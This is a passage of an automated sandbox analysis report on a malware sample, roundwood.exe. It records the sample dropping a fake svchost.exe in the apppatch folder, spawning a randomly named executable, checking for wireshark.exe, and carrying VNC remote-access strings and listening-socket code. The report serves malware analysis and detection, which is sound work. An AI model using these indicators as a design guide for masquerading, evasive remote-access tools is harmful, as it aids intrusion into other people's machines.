Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_00402340 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,

0_2_00402340

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_00403920 GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,

0_2_00403920

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D048C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle,

2_2_02D048C0

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_00403310 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,

0_2_00403310

Source: roundwood.exe, roundwood.exe, 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, roundwood.exe, 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272240736.0000000002915000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273788686.0000000002D63000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272240736.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp

Binary or memory string: wireshark.exe

Remote Access Functionality

Contains VNC / remote desktop functionality (version string found)

Source: roundwood.exe	String found in binary or memory: RFB 003.006
Source: roundwood.exe, 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: roundwood.exe, 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: roundwood.exe, 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: RFB 003.006
Source: roundwood.exe, 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe	String found in binary or memory: RFB 003.006
Source: svchost.exe	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3272240736.0000000002915000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3272240736.0000000002915000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3273788686.0000000002D63000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3273788686.0000000002D63000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3272240736.00000000028C0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3272240736.00000000028C0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2719357526.00000000012E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2719357526.00000000012E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2719273525.0000000001240000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2719273525.0000000001240000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000002.2689381612.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000002.2689381612.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000002.2689429346.0000000000E30000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000002.2689429346.0000000000E30000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2460508314.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2460508314.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000017.00000002.2469299462.0000000002920000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000017.00000002.2469299462.0000000002920000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000017.00000002.2469451874.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000017.00000002.2469451874.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000019.00000002.2472684695.00000000008E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000019.00000002.2472684695.00000000008E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000019.00000002.2473316243.0000000002650000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000019.00000002.2473316243.0000000002650000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001B.00000002.2475050431.00000000029F0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001B.00000002.2475050431.00000000029F0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001B.00000002.2477343804.0000000002DA0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001B.00000002.2477343804.0000000002DA0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001D.00000002.2479482654.0000000002D00000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001D.00000002.2479482654.0000000002D00000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001D.00000002.2478719931.0000000002920000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001D.00000002.2478719931.0000000002920000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001F.00000002.2486303903.0000000002410000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001F.00000002.2486303903.0000000002410000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001F.00000002.2486764914.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001F.00000002.2486764914.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000022.00000002.2487689003.0000000002950000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000022.00000002.2487689003.0000000002950000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000022.00000002.2487542677.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000022.00000002.2487542677.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000024.00000002.2570365409.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000024.00000002.2570365409.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000024.00000002.2535425288.00000000028C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000024.00000002.2535425288.00000000028C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502070915.0000000002760000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502070915.0000000002760000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D198E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	2_2_02D198E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D2FFE0 setsockopt,htons,socket,setsockopt,bind,	2_2_02D2FFE0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D30DB0 htons,socket,setsockopt,closesocket,bind,listen,	2_2_02D30DB0
